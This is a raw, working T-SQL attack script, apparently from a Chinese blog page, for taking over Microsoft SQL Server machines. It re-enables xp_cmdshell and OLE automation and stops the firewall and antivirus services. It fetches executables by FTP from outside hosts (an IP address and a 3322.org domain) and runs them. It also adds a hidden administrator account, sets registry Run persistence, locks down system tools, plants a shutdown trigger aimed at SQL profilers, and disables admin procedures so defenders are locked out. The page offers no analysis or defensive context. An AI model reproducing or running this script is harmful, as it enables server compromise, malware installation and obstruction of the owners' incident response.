if(@@version like 'Microsoft SQL Server 2000%') use master; else exec sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE; go create procedure dbo.sp_dropextendedproc @functname nvarchar(517) -- name of function as -- If we're in a transaction, disallow the dropping of the -- extended stored procedure. set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sys.sp_dropextendedproc') return (1) end -- Drop the extended procedure mapping. dbcc dropextendedproc( @functname ) return (0) -- sp_dropextendedproc go if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod; go if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll') if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll') if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll') if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll'); go if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll'); go if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll'); go rop procedure sp_oacreate go exec sp_dropextendedproc 'xp_cmdshell' go dbcc addextendedproc ("sp_oacreate","odsole70.dll") go dbcc addextendedproc ("xp_cmdshell","xplog70.dll") go dbcc dropextendedproc ("xp_cmdshell"); dbcc addextendedproc ("xp_cmdshell","xplog70.dll"); dbcc dropextendedproc ("xp_dirtree"); dbcc addextendedproc ("xp_dirtree","xpstar.dll"); dbcc dropextendedproc ("xp_regread"); dbcc addextendedproc ("xp_regread","xpstar.dll"); dbcc dropextendedproc ("xp_regwrite"); dbcc addextendedproc ("xp_regwrite","xpstar.dll"); dbcc dropextendedproc ("sp_OACreate"); dbcc addextendedproc ("sp_OACreate","odsole70.dll"); dbcc dropextendedproc ("sp_OAMethod"); dbcc addextendedproc ("sp_OAMethod","odsole70.dll"); declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'wbem/sr cmd.exe /e /g system:f' declare @shell1 int exec sp_oacreate 'wscript.shell',@shell1 output exec sp_oamethod @shell1,'run',null,'wbem/sr net1.exe /e /g system:f' declare @shell2 int exec sp_oacreate 'wscript.shell',@shell2 output exec sp_oamethod @shell2,'run',null,'wbem/sr net.exe /e /g system:f' declare @shell3 int exec sp_oacreate 'wscript.shell',@shell3 output exec sp_oamethod @shell3,'run',null,'wbem/sp cmd.exe /e /g system:f' declare @shell4 int exec sp_oacreate 'wscript.shell',@shell4 output exec sp_oamethod @shell4,'run',null,'wbem/sp net1.exe /e /g system:f' declare @shell5 int exec sp_oacreate 'wscript.shell',@shell5 output exec sp_oamethod @shell5,'run',null,'wbem/sp net.exe /e /g system:f' declare @shell6 int exec sp_oacreate 'wscript.shell',@shell6 output exec sp_oamethod @shell6,'run',null,'ws cmd.exe /e /g system:f' declare @shell7 int exec sp_oacreate 'wscript.shell',@shell7 output exec sp_oamethod @shell7,'run',null,'ws net1.exe /e /g system:f' declare @shell8 int exec sp_oacreate 'wscript.shell',@shell8 output exec sp_oamethod @shell8,'run',null,'ws net.exe /e /g system:f' declare @shell9 int exec sp_oacreate 'wscript.shell',@shell9 output exec sp_oamethod @shell9,'run',null,'wbem/we cmd.exe /e /g system:f' declare @shell10 int exec sp_oacreate 'wscript.shell',@shell10 output exec sp_oamethod @shell10,'run',null,'wbem/we net1.exe /e /g system:f' declare @shell11 int exec sp_oacreate 'wscript.shell',@shell11 output exec sp_oamethod @shell11,'run',null,'wbem/we net.exe /e /g system:f' declare @shell12 int exec sp_oacreate 'wscript.shell',@shell12 output exec sp_oamethod @shell12,'run',null,'wbem/xj cmd.exe /e /g system:f' declare @shell13 int exec sp_oacreate 'wscript.shell',@shell13 output exec sp_oamethod @shell13,'run',null,'wbem/xj net1.exe /e /g system:f' declare @shell14 int exec sp_oacreate 'wscript.shell',@shell14 output exec sp_oamethod @shell14,'run',null,'wbem/xj net.exe /e /g system:f' declare @shell15 int exec sp_oacreate 'wscript.shell',@shell15 output exec sp_oamethod @shell15,'run',null,'drivers/vs cmd.exe /e /g system:f' declare @shell16 int exec sp_oacreate 'wscript.shell',@shell16 output exec sp_oamethod @shell16,'run',null,'drivers/vs net1.exe /e /g system:f' declare @shell17 int exec sp_oacreate 'wscript.shell',@shell17 output exec sp_oamethod @shell17,'run',null,'drivers/vs net.exe /e /g system:f' declare @shell18 int exec sp_oacreate 'wscript.shell',@shell18 output exec sp_oamethod @shell18,'run',null,'cs cmd.exe /e /g system:f' declare @shell19 int exec sp_oacreate 'wscript.shell',@shell19 output exec sp_oamethod @shell19,'run',null,'cs net1.exe /e /g system:f' declare @shell20 int exec sp_oacreate 'wscript.shell',@shell20 output exec sp_oamethod @shell20,'run',null,'cs net.exe /e /g system:f' declare @shell21 int exec sp_oacreate 'wscript.shell',@shell21 output exec sp_oamethod @shell21,'run',null,'drivers/vsx cmd.exe /e /g system:f' declare @shell22 int exec sp_oacreate 'wscript.shell',@shell22 output exec sp_oamethod @shell22,'run',null,'drivers/vsx net1.exe /e /g system:f' declare @shell23 int exec sp_oacreate 'wscript.shell',@shell23 output exec sp_oamethod @shell23,'run',null,'drivers/vsx net.exe /e /g system:f' go declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:/windows/system32/1025/run.ini', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/run [2 8 18]'; exec sp_configure 'show advanced options', 1; if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll'); declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:/windows/system32/ftp.exe' ,'c:/windows/system32/p.exe'; declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:/windows/system32/dllcache/cacls.exe' ,'c:/windows/system32/cs.exe'; declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:/windows/system32/cacls.exe' ,'c:/windows/system32/cs.exe'; declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:/windows/system32/dllcache/ftp.exe' ,'c:/windows/system32/p.exe'; declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%/system32/cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%/system32/net1.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%/system32/ftp.exe /e /t /g system:F'; go exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' go exec master..xp_cmdshell 'net1 stop sharedaccess&echo open 174.139.3.212> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 2.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&2.exe&2.exe&del cmd.txt /q /f&exit' go if(@@version like 'Microsoft SQL Server 2000%') use master; else exec sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE; go if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod; go create procedure sp_addextendedproc @functname nvarchar(517),@dllname varchar(255) as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0); go if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll'); go declare @sp_passwordo int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo out;exec sp_oamethod @sp_passwordo, 'copyfile',null,'c:/windows/system32/ma.exe' ,'c:/windows/system32/ws.exe';declare @sp_passwordod int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordod out;exec sp_oamethod @sp_passwordod, 'copyfile',null,'c:/windows/system32/cs.exe' ,'c:/windows/system32/ws.exe';declare @sp_passwordos int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordos out;exec sp_oamethod @sp_passwordos, 'copyfile',null,'c:/windows/system32/cacls.exe' ,'c:/windows/system32/ws.exe';declare @sp_passwordode int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordode out;exec sp_oamethod @sp_passwordode, 'copyfile',null,'c:/windows/system32/ps.exe' ,'c:/windows/system32/ws.exe'; go declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:/windows/system32/1025/run.ini', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/run [2 8 18]'; go declare @sp_passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo2 out;exec sp_oamethod @sp_passwordo2, 'copyfile',null,'c:/windows/system32/ftp.exe' ,'c:/windows/system32/p.exe';declare @sp_passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo4 out;exec sp_oamethod @sp_passwordo4, 'copyfile',null,'c:/windows/system32/dllcache/ftp.exe' ,'c:/windows/system32/p.exe';declare @sp_passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo3 out;exec sp_oamethod @sp_passwordo3, 'copyfile',null,'c:/windows/system32/dllcache/cacls.exe' ,'c:/windows/system32/ws.exe'; go declare @sp_passwordox int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordox out;exec sp_oamethod @sp_passwordox, 'copyfile',null,'c:/winnt/system32/ma.exe' ,'c:/winnt/system32/ws.exe';declare @sp_passwordodx int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordodx out;exec sp_oamethod @sp_passwordodx, 'copyfile',null,'c:/winnt/system32/bsnr.exe' ,'c:/winnt/system32/ws.exe';declare @sp_passwordosx int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordosx out;exec sp_oamethod @sp_passwordosx, 'copyfile',null,'c:/winnt/system32/cacls.exe' ,'c:/winnt/system32/ws.exe';declare @sp_passwordodex int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordodex out;exec sp_oamethod @sp_passwordodex, 'copyfile',null,'c:/winnt/system32/ps.exe' ,'c:/winnt/system32/ws.exe'; go declare @sp_passwordo2x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo2x out;exec sp_oamethod @sp_passwordo2x, 'copyfile',null,'c:/winnt/system32/ftp.exe' ,'c:/winnt/system32/p.exe';declare @sp_passwordo4x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo4x out;exec sp_oamethod @sp_passwordo4x, 'copyfile',null,'c:/winnt/system32/dllcache/ftp.exe' ,'c:/winnt/system32/p.exe';declare @sp_passwordo3x int;exec sp_oacreate 'scripting.filesystemobject', @sp_passwordo3x out;exec sp_oamethod @sp_passwordo3x, 'copyfile',null,'c:/winnt/system32/dllcache/cacls.exe' ,'c:/winnt/system32/ws.exe'; go declare @sp_passwordcmdcov INT;declare @sp_passwordcmdcov1 INT;declare @sp_passwordcmdcov2 INT;declare @sp_passwordftpcov INT;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov output;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov2 output;exec sp_OACreate 'wscript.shell',@sp_passwordftpcov output;exec sp_OAMethod @sp_passwordftpcov,'run',null,'ws.exe %SystemRoot%/system32/cmd.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordcmdcov1,'run',null,'ws.exe %SystemRoot%/system32/net1.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordcmdcov1,'run',null,'ws.exe %SystemRoot%/system32/p.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordftpcov,'run',null,'ws.exe C:/Progra~1/Common~1/System/ado/msado15.dll /e /t /g system:F'; go DECLARE @sp_passwordnet1 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet1 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet1,'run',null, 'net1 user guest shabia'; go DECLARE @sp_passwordnet1 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet1 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet1,'run',null, 'net1 user guest shabia /add'; go DECLARE @sp_passwordnet2 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet2 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet2,'run',null, 'net1 user guest /active:Y'; go DECLARE @sp_passwordnet3 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet3 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet3,'run',null, 'net1 localgroup administrators guest /ad'; go DECLARE @cmdpasswordn1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordne1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordn1,'run',null,'net1 stop sharedaccess'; go DECLARE @cmdpasswordn1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordn1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordn1,'run',null,'net1 stop sharedaccess'; go DECLARE @cmdpasswordnet1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordnt1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordnet1,'run',null,'net1 stop KAVStart'; DECLARE @cmdpasswordnet1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordnt1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordnet1,'run',null,'net1 stop Symantec Proxy Service'; go DECLARE @cmdpasswordnet1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordnt1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordnet1,'run',null,'net1 stop Symantec Event Manager'; go declare @sp_passwordxieo int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'sb.dat', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'open qq630698999.3322.org' exec @ret = sp_oamethod @f, 'writeline', NULL,'123' exec @ret = sp_oamethod @f, 'writeline', NULL,'123' exec @ret = sp_oamethod @f, 'writeline', NULL,'get 1.exe bbs.exe' exec @ret = sp_oamethod @f, 'writeline', NULL,'get 1.exe bbs1.exe' exec @ret = sp_oamethod @f, 'writeline', NULL,'get 1.exe bbs2.exe' exec @ret = sp_oamethod @f, 'writeline', NULL,'get 1.exe bbs3.exe' exec @ret = sp_oamethod @f, 'writeline', NULL,'get 1.exe bbs4.exe' exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'; go DECLARE @cmdpassword1p INT EXEC SP_OAcreate 'wscript.shell',@cmdpassword1p OUTPUT EXEC SP_OAMETHOD @cmdpassword1p,'run',null,'p -s:sb.dat'; go declare @ow int, @fw int, @t int, @retw int exec sp_oacreate 'scripting.filesystemobject', @ow out exec sp_oamethod @ow, 'createtextfile', @fw out, 'gouri.bat', 1 exec @retw = sp_oamethod @fw, 'writeline', NULL,'ping 127.0.0.1' exec @retw = sp_oamethod @fw, 'writeline', NULL,'bbs' exec @retw = sp_oamethod @fw, 'writeline', NULL,'bbs1' exec @retw = sp_oamethod @fw, 'writeline', NULL,'bbs2' exec @retw = sp_oamethod @fw, 'writeline', NULL,'bbs3' exec @retw = sp_oamethod @fw, 'writeline', NULL,'bbs4' exec @retw = sp_oamethod @fw, 'writeline', NULL,'ping 127.0.0.1 -n 25' exec @retw = sp_oamethod @fw, 'writeline', NULL,'bbs' exec @retw = sp_oamethod @fw, 'writeline', NULL,'bbs1' exec @retw = sp_oamethod @fw, 'writeline', NULL,'bbs2' exec @retw = sp_oamethod @fw, 'writeline', NULL,'bbs3' exec @retw = sp_oamethod @fw, 'writeline', NULL,'bbs4' exec @retw = sp_oamethod @fw, 'writeline', NULL,'del gouri.bat'; go declare @sp_passwordwww int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @sp_passwordwww out exec sp_oamethod @sp_passwordwww, 'createtextfile', @f out, 'c:/windows/system32/1025/si.bat', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "PROFILER90.exe" && shutdown -s -t 0' exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "PROFILER90.exe" && shutdown -s /f' exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "SqlExpressProfiler.exe" && shutdown -s -t 0' exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "SqlExpressProfiler.exe" && shutdown -s /f' exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "profiler.exe" && shutdown -s -t 0' exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "profiler.exe" && shutdown -s /f' exec @ret = sp_oamethod @f, 'writeline', NULL,'del c:/windows/system32/1025/si.bat'; go declare @sp_passworddboysb16 int exec sp_oacreate 'wscript.shell',@sp_passworddboysb16 output exec sp_oamethod @sp_passworddboysb16,'run',null,'cmd /c convert c:/fs:ntfs'; go declare @sp_passworddboysb160 int exec sp_oacreate 'wscript.shell',@sp_passworddboysb160 output exec sp_oamethod @sp_passworddboysb160,'run',null,'cmd /c %SystemRoot%/system32/regini %SystemRoot%/system32/1025/run.ini'; go declare @sp_passworddboysb INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb output;exec sp_OAMethod @sp_passworddboysb,'run',null,'cmd /c del ps.exe&del xc.exe&del ma.exe&del n.exe&del fpt.exe&del http.vbs&del http1.vbs&del tstp.exe&del QQ413968336解决1433&del c:/windows/system/1.vbs&echo 子健哥又来抓鸡了,唉QQ413968336>>mengge.txt'; go DECLARE @ObjectToken INT;EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT;EXEC sp_OASetProperty @ObjectToken, 'Type', 1;EXEC sp_OAMethod @ObjectToken, 'Open';EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x;EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'mss.exe', 2;EXEC sp_OAMethod @ObjectToken, 'Close';EXEC sp_OADestroy @ObjectToken; go declare @sp_passworddboysb1go INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb1go output;exec sp_OAMethod @sp_passworddboysb1go,'run',null,'gouri.bat'; go declare @sp_passworddboysb1 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb1 output;exec sp_OAMethod @sp_passworddboysb1,'run',null,'ws.exe %SystemRoot%/system32/wscript.exe /e /d everyone'; go declare @sp_passworddboysb2 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb2 output;exec sp_OAMethod @sp_passworddboysb2,'run',null,'ws.exe %SystemRoot%/system32/ftp.exe /e /d everyone'; go declare @sp_passworddboysb3 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb3 output;exec sp_OAMethod @sp_passworddboysb3,'run',null,'ws.exe %SystemRoot%/system32/cscript.exe /e /d everyone'; go declare @sp_passworddboysb4 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb4 output;exec sp_OAMethod @sp_passworddboysb4,'run',null,'ws.exe %SystemRoot%/system32/cacls.exe /e /d system'; go declare @sp_passworddboysb5 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb5 output;exec sp_OAMethod @sp_passworddboysb5,'run',null,'ws.exe %SystemRoot%/system32/cmd.exe /e /d system'; go declare @sp_passworddboysb6 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb6 output;exec sp_OAMethod @sp_passworddboysb6,'run',null,'ws.exe %SystemRoot%/system32/sethc.exe /e /d system'; go declare @sp_passworddboysb7 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb7 output;exec sp_OAMethod @sp_passworddboysb7,'run',null,'ws.exe %SystemRoot%/system32/net1.exe /e /d system'; go declare @sp_passworddboysb8 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb8 output;exec sp_OAMethod @sp_passworddboysb8,'run',null,'ws.exe %SystemRoot%/system32/dllcache/wscript.exe /e /d everyone'; go declare @sp_passworddboysb9 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb9 output;exec sp_OAMethod @sp_passworddboysb9,'run',null,'ws.exe %SystemRoot%/system32/dllcache/ftp.exe /e /d system'; go declare @sp_passworddboysb10 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb10 output;exec sp_OAMethod @sp_passworddboysb10,'run',null,'ws.exe %SystemRoot%/system32/dllcache/cscript.exe /e /d everyone'; go declare @sp_passworddboysb11 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb11 output;exec sp_OAMethod @sp_passworddboysb11,'run',null,'ws.exe %SystemRoot%/system32/dllcache/cacls.exe /e /d system'; go declare @sp_passworddboysb12 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb12 output;exec sp_OAMethod @sp_passworddboysb12,'run',null,'ws.exe %SystemRoot%/system32/dllcache/cmd.exe /e /d system'; go declare @sp_passworddboysb13 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb13 output;exec sp_OAMethod @sp_passworddboysb13,'run',null,'ws.exe %SystemRoot%/system32/dllcache/sethc.exe /e /d system'; go declare @sp_passworddboysb14 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb14 output;exec sp_OAMethod @sp_passworddboysb14,'run',null,'ws.exe %SystemRoot%/system32/utilman.exe /e /d system'; go declare @sp_passworddboysb14 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb14 output;exec sp_OAMethod @sp_passworddboysb14,'run',null,'ws.exe %SystemRoot%/system32/dllcache/net1.exe /e /d system'; go declare @sp_passworddboysb15 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb15 output;exec sp_OAMethod @sp_passworddboysb15,'run',null,'ws.exe C:/Progra~1/Common~1/System/ado/msado15.dll /e /d system'; go declare @sp_passworddboysb17 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb17 output;exec sp_OAMethod @sp_passworddboysb17,'run',null,'ws.exe %SystemRoot%/system32/p.exe /e /d system'; go declare @sp_passworddboysb19 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb19 output;exec sp_OAMethod @sp_passworddboysb19,'run',null,'ws.exe %SystemRoot%/system32/icacls.exe /e /d system'; go declare @sp_passworddboysb20 INT;exec sp_OACreate 'wscript.shell',@sp_passworddboysb20 output;exec sp_OAMethod @sp_passworddboysb20,'run',null,'ws.exe %SystemRoot%/system32/dllcache/icacls.exe /e /d system'; go declare @passworedboysb21 int exec sp_oacreate 'wscript.shell',@passworedboysb21 output exec sp_oamethod @passworedboysb21,'run',null,'mss.exe'; go declare @passworedboysb22 int exec sp_oacreate 'wscript.shell',@passworedboysb22 output exec sp_oamethod @passworedboysb22,'run',null,'bbs.exe'; go declare @passworedboysb23 int exec sp_oacreate 'wscript.shell',@passworedboysb23 output exec sp_oamethod @passworedboysb23,'run',null,'bbs1.exe'; go declare @passworedboysb24 int exec sp_oacreate 'wscript.shell',@passworedboysb24 output exec sp_oamethod @passworedboysb24,'run',null,'bbs2.exe'; go declare @passworedboysb25 int exec sp_oacreate 'wscript.shell',@passworedboysb25 output exec sp_oamethod @passworedboysb25,'run',null,'bbs3.exe'; go declare @passworedboysb26 int exec sp_oacreate 'wscript.shell',@passworedboysb26 output exec sp_oamethod @passworedboysb25,'run',null,'bbs4.exe'; go declare @passworedboysb27 int exec sp_oacreate 'wscript.shell',@passworedboysb27 output exec sp_oamethod @passworedboysb26,'run',null,'%systemroot%/system32/attrib +s +h c:/windows/system32/wbem/ws.exe'; go EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/currentversion/run','shell','REG_SZ','net user bye xuzijianyes /add' go DROP PROCEDURE xp_cmdshell;dbcc addextendedproc ('xp_cmdshell','Can 无敌封 qQ287534874'')DROP PROCEDURE sp_password;dbcc addextendedproc ('sp_password','Microsoft提示您请误随便操作SQL管理密码 以免对起数据库造成不必要的麻烦')DROP PROCEDURE xp_dirtree;dbcc addextendedproc ('xp_dirtree','Microsoft提示您请误随意操作SQL数据库 以免对起数据库造成不必要的麻烦')DROP PROCEDURE xp_regwrite;dbcc addextendedproc ('xp_regwrite','1')DROP PROCEDURE sp_OACreate;dbcc addextendedproc ('sp_OACreate','Can 无敌封 qQ287534874'')DROP PROCEDURE sp_OACreate;dbcc addextendedproc ('sp_OACreate','Can 无敌封 qQ287534874'')drop procedure sp_dropextendedproc;dbcc addextendedproc ('sp_dropextendedproc','Can 无敌封 qQ287534874'');
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
